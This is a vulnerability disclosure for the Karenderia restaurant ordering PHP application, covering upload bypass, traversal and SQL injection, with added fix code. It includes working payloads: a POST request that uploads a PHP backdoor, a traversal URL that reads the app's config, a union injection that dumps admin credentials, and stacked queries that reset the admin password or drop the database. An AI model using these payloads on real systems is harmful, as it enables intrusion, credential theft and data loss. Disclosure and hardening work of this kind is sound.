Karenderia Multiple Restaurant System Report multiple vulnerabilities



1. UNRESTRICTED FILE UPLOAD
File: protected/components/AjaxAdmin.php
Function name: uploadImage
The error lies here:

    $qqfile = $_GET['qqfile'];
    preg_match("/.php/i", $qqfile)

The function reads the file name from the GET request variables and tests whether it contains a php extension.
But for naming and moving the file, the $this->data variable is used instead. If the attacker sends a GET request for the file upload, the checked parameter $qqfile and $this->data['qqfile'] will be the same. In the case of a POST request with qqfile as a query parameter the result is different, as shown:

    $pathinfo = pathinfo($this->data['qqfile']);

Now if I send a POST request instead of GET to the server with the POST parameters qqfile = backdoor.php and content = <?php code…. ?>, the file will be uploaded.
Example:
POST Request:
POST /admin/ajax?qqfile=avatar.png HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-Length: 7
Content-Type: application/x-www-form-urlencoded

action=uploadImage&qqfile=backdoor.php&currentController=admin&content=<?php code.... ?>
Here you will see that "?qqfile=avatar.png" is the GET parameter, and it successfully passes the php check.
The POST parameter qqfile is what gets used for the file name, hence the php backdoor is uploaded.
One more thing: currentController=admin.
Instead of the value "admin", the value "store" can also be used (any value is accepted for currentController). There is no check in the code to determine whether the session belongs to an admin or a store (speaking specifically about the uploadImage function).

How to Prevent it.
1.  Use the method the MOBILEAPP module uses for uploading files instead, i.e. protected\modules\mobileapp\components\uploder.php.
Or
2.  Modify the code of the uploadImage function as explained below.
Use
    $qqfile = $this->data['qqfile'];
instead of
    $qqfile = $_GET['qqfile'];
Now whether it is a POST or a GET request, the parameter that is actually used for the file is the one that gets tested.
And instead of preg_match for testing whether the extension is php or not, make an array of allowed file extensions:

    $allowed = ['.jpg', '.JPG', '.png' /* ... other permitted image extensions */];
    if (in_array($extension, $allowed, true)) {
        $newFileName = $oldName . time() . $extension;
    }

I am suggesting this because preg_match produces INVALID FILE for a legitimate image named "xyzdsfkj.phpxyz123.png".
Appending the extension from the allowed list prevents the uploaded file from being named as the attacker chooses. Thus whatever the file name and extension were, in the end only the allowed extension will be appended.
Now the upload is safe.
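As an added example (not Karenderia's code), here is the allowlist approach above written out as a complete check in PHP. The names $requestData (standing in for the $this->data array the handler already uses), $bytes (the uploaded content, the "content" field in the request shown earlier) and $uploadDir are assumptions. Beyond what the report suggests, it also verifies that the bytes decode as an image before writing them, as defence in depth against a renamed PHP file.

```php
<?php
// Added example, not Karenderia's code. Assumed names: $requestData is the
// merged request array the handler already uses ($this->data in the report),
// $bytes is the uploaded content, $uploadDir is the destination directory.

function buildSafeUploadPath(array $requestData, string $uploadDir): ?string
{
    // Take the name from the same array that is later used to move the file,
    // so a GET/POST mismatch cannot bypass the check.
    $original = (string)($requestData['qqfile'] ?? '');
    if ($original === '' || strpos($original, "\0") !== false) {
        return null;
    }

    // Only the final extension is considered: "x.php.png" yields "png", and
    // "xyzdsfkj.phpxyz123.png" is accepted, unlike with preg_match("/.php/i").
    $ext = strtolower(pathinfo($original, PATHINFO_EXTENSION));
    $allowed = ['jpg', 'jpeg', 'png', 'gif'];
    if (!in_array($ext, $allowed, true)) {
        return null;
    }

    // Server-chosen name: stripped base name + timestamp + allowlisted extension.
    // Dots are removed from the base so "shell.php" cannot survive as a middle
    // extension (relevant for web servers that honour multiple extensions).
    $base = pathinfo(basename($original), PATHINFO_FILENAME);
    $base = preg_replace('/[^A-Za-z0-9_-]/', '', $base);
    if ($base === null || $base === '') {
        $base = 'upload';
    }

    return rtrim($uploadDir, '/\\') . DIRECTORY_SEPARATOR
         . $base . '_' . time() . '.' . $ext;
}

function storeUpload(array $requestData, string $bytes, string $uploadDir): ?string
{
    $target = buildSafeUploadPath($requestData, $uploadDir);
    if ($target === null) {
        return null; // bad name or extension not in the allowlist
    }
    // Defence in depth: the content must decode as an image regardless of the
    // name; getimagesizefromstring() returns false for a PHP script.
    if (@getimagesizefromstring($bytes) === false) {
        return null;
    }
    return file_put_contents($target, $bytes, LOCK_EX) === false ? null : $target;
}
```

storeUpload() returns the stored path or null; the caller decides what JSON to send back. The upload directory should additionally be configured so the web server never executes scripts from it, which removes the impact of any future bypass of the name check.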
2. LOCAL FILE INCLUSION.
Condition: can only be exploited after admin login (the SQL injection below can be used to view the admin_user passwords and then log in with them).
File: AdminController.php
Function: actionviewFile
GET parameter: fileName.
Now fileName=xyzimage.jpg will show a file from the upload directory, but using directory traversal (../../) we can view any file the php script has permission to read.
It is very harmful for a VPS-hosted website, because the Linux file system can be viewed and that helps to take over the full system. Example:
http://bastisapp.com/kmrs/admin/viewfile?fileName=../protected/config/main.php
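The report does not give a fix for this one, so here is an added example (not Karenderia's code) of how a viewfile action can be constrained to the upload directory: accept a bare file name only, resolve it with realpath(), and confirm the result still lies below the directory. The names resolveUploadPath, actionViewFileSafe and $uploadDir are assumptions; CHttpException is Yii 1's HTTP exception class.

```php
<?php
// Added example, not Karenderia's code. Assumed names: $uploadDir is the
// absolute path of the upload directory, fileName is the raw GET parameter
// named in the report.

function resolveUploadPath(string $uploadDir, string $fileName): ?string
{
    $root = realpath($uploadDir);
    if ($root === false) {
        return null;
    }

    // Accept plain file names only: no null bytes, no separators, no "." / "..".
    if ($fileName === '' || $fileName === '.' || $fileName === '..'
        || strpos($fileName, "\0") !== false
        || strpbrk($fileName, "/\\") !== false) {
        return null;
    }

    // realpath() collapses any remaining traversal and follows symlinks; the
    // result must be a regular file that still sits below the upload directory.
    $full = realpath($root . DIRECTORY_SEPARATOR . $fileName);
    if ($full === false || !is_file($full)
        || strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Controller side (Yii 1 style), replacing a direct readfile() on the parameter.
function actionViewFileSafe(string $uploadDir): void
{
    $path = resolveUploadPath($uploadDir, (string)($_GET['fileName'] ?? ''));
    if ($path === null) {
        // Same response for "outside the directory" and "does not exist",
        // so the endpoint cannot be used to probe the file system.
        throw new CHttpException(404, 'File not found.');
    }
    header('Content-Type: ' . (mime_content_type($path) ?: 'application/octet-stream'));
    header('Content-Disposition: inline; filename="' . basename($path) . '"');
    readfile($path);
}
```

With this in place, fileName=../protected/config/main.php is rejected at the separator check before any file system call is made, and a symlink planted inside the upload directory is caught by the realpath() prefix comparison.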


MOST IMPORTANT SQL INJECTION
Vulnerable files: Ajax.php, AjaxAdmin.php, or any other file that performs DB operations with unsanitized user input.
Example of how the SQL injection was performed using a union query.
File: AjaxAdmin.php
Function: loadCreditCardListMerchant
Injection parameter: merchant_id
Payload for union: 1' and 1=2 union all select $injection_point,2,3,4,5,6,7,8,9,10 #
Payload for stacked query: 1' ; $sql_query ; #
Original Post Request:
POST /kmrs/admin/ajax HTTP/1.1
Host: bastisapp.com
Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0  AppleWebKit/537.36 (KHTML, like Gecko) Chrome /537.36
Referer: http://bastiapp.com/kmrs/profile
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,hi;q=0.7
Cookie: _lang=en; kr_cookie_law=2; kr_search_address=Los+Angeles%2C+CA%2C+United+States; client_location=%7B%22lat%22%3A34.0522342%2C%22long%22%3A-118.2436849%7D; PHPSESSID=9793600ef0691414fd809e6b7524df45; YII_CSRF_TOKEN=c47c288be746247583d9f19c288f76d579e5efab

merchant_id=1&action=loadCreditCardListMerchant&currentController=store&yii_session_token=9793600ef0691414fd809e6b7524df45&YII_CSRF_TOKEN=c47c288be746247583d9f19c288f76d579e5efab

This original request can be modified to view the desired result.
We know that the merchant_cc table has 10 columns and a select * ….. query is used in that function.
So we make a union query for 10 columns, as shown in the payload.
The POSTed merchant_id parameter is modified to:
merchant_id=1' and 1=2 union all select concat(username,password),2,3,4,5,6,7,8,10 from mt_admin_user #
This makes the query executed by your PHP application:
SELECT * FROM
       {{merchant_cc}}        WHERE
merchant_id='1' and 1=2 union all select concat(username,0x20,password),2,3,4,5,6,7,8,10 from mt_admin_user #'
                             ORDER BY mt_id DESC
And your app will return:

[screenshot: result]

Now the dangerous stacked queries:

The same POST request, with the merchant_id parameter modified to:
merchant_id=1' ; sql_query ; #
Here sql_query can be: update, delete, alter, drop.
Example: drop database db_name
The generated SQL query will be:
SELECT * FROM
       {{merchant_cc}}        WHERE
merchant_id='1' ; update mt_admin_user set password = 'new_md5_hash_for_pass_you_know' where admin_id=1 ; # '
                             ORDER BY mt_id DESC
Please note that you cannot read the result of a SELECT statement from a stacked query unless the code is really, really bad.
PREVENTION:
1.  Use the quoteValue function, or the sanitize-string function for longer text, from Yii in all the DB operations where the SQL query is built from user input (GET/POST).
2.  Prepared statements are used in PHP for full protection from injection (you may check whether Yii 1 supports prepared statements or not).
Please note that I have shown this only for the loadCreditCardListMerchant function; the same method applies to any other function that interacts with the database without properly sanitizing user input. You will need to take prevention steps wherever this type of mistake is made to make the application secure.
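To make both prevention points concrete, here is an added example (not Karenderia's code) of the loadCreditCardListMerchant query in the vulnerable shape described above, next to the same query with a bound parameter and with quoteValue(). It uses Yii 1.1's CDbCommand API (createCommand, bindValue, queryAll) and CDbConnection::quoteValue(), which answers the question in point 2: Yii 1 does support prepared statements through PDO. The function names and the $merchantId argument are assumptions.

```php
<?php
// Added example, not Karenderia's code. Uses Yii 1.1's CDbCommand API
// (createCommand, bindValue, queryAll) and CDbConnection::quoteValue();
// the function names and $merchantId argument are assumed for illustration.

// The vulnerable shape described in the report: the parameter is spliced
// into the SQL text, so a quote inside it closes the literal and everything
// after it (union, '#', ';') is parsed as SQL.
function loadCreditCardListUnsafe(string $merchantId): array
{
    $sql = "SELECT * FROM {{merchant_cc}} WHERE merchant_id='" . $merchantId
         . "' ORDER BY mt_id DESC";
    return Yii::app()->db->createCommand($sql)->queryAll();
}

// Hardened with a bound parameter: the value travels separately from the
// statement, so quotes, comments and statement separators in it stay data.
function loadCreditCardList(string $merchantId): array
{
    $sql = "SELECT * FROM {{merchant_cc}} WHERE merchant_id = :merchant_id "
         . "ORDER BY mt_id DESC";
    return Yii::app()->db->createCommand($sql)
        ->bindValue(':merchant_id', $merchantId, PDO::PARAM_STR)
        ->queryAll();
}

// Fallback for legacy code that still concatenates (point 1 of the report):
// quoteValue() escapes the value and wraps it in quotes for the driver.
function loadCreditCardListQuoted(string $merchantId): array
{
    $db  = Yii::app()->db;
    $sql = "SELECT * FROM {{merchant_cc}} WHERE merchant_id="
         . $db->quoteValue($merchantId) . " ORDER BY mt_id DESC";
    return $db->createCommand($sql)->queryAll();
}
```

Where merchant_id is a numeric column, casting the request value with (int) before use is the simplest safe option; binding works for any column type and is the one to standardise on across every function that builds SQL from request input.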


Links: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
